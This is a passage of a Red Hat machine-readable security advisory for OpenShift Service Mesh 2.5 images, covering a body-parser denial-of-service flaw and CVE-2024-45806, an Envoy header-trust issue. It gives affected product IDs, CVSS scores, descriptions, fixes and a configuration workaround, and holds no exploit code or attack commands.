"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, { acknowledgments: [ { names: [ "Mike Whale", ], }, { names: [ "James Force", ], organization: "Red Hat", summary: "This issue was discovered by Red Hat.", }, ], cve: "CVE-2024-45806", cwe: { id: "CWE-639", name: "Authorization Bypass Through User-Controlled Key", }, discovery_date: "2024-09-20T00:40:20.976812+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2313683", }, ], notes: [ { category: "description", text: "A vulnerability was found in Envoy that allows external clients to manipulate Envoy headers, potentially leading to unauthorized access or other malicious actions within the mesh. This issue arises due to Envoy's default configuration of internal trust boundaries, which considers all RFC1918 private address ranges as internal. The default behavior for handling internal addresses in Envoy has been changed. Previously, RFC1918 IP addresses were automatically considered internal, even if the internal_address_config was empty. The default configuration of Envoy will continue to trust internal addresses while in this release and it will not trust them by default in next release. If you have tooling such as probes on your private network which need to be treated as trusted such as changing arbitrary x-envoy headers, please explicitly include those addresses or CIDR ranges into `internal_address_config`. Successful exploitation could allow attackers to bypass security controls, access sensitive data, or disrupt services within the mesh, like Istio.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Potential to manipulate `x-envoy` headers from external sources", title: "Vulnerability summary", }, { category: "other", text: "Red Hat's CVSS score and impact are specific to our product and may not match those of upstream. This is due to how envoy is configured and used within our OpenShift Service Mesh product.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45806", }, { category: "external", summary: "RHBZ#2313683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313683", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45806", url: "https://www.cve.org/CVERecord?id=CVE-2024-45806", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45806", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45806", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf", }, ], release_date: "2024-09-20T00:15:02.293000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "This flaw can be mitigated by configuring envoy to treat all IPs as external. This is done by setting the internal_address_config range for envoy to `0.0.0.0/32`.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", 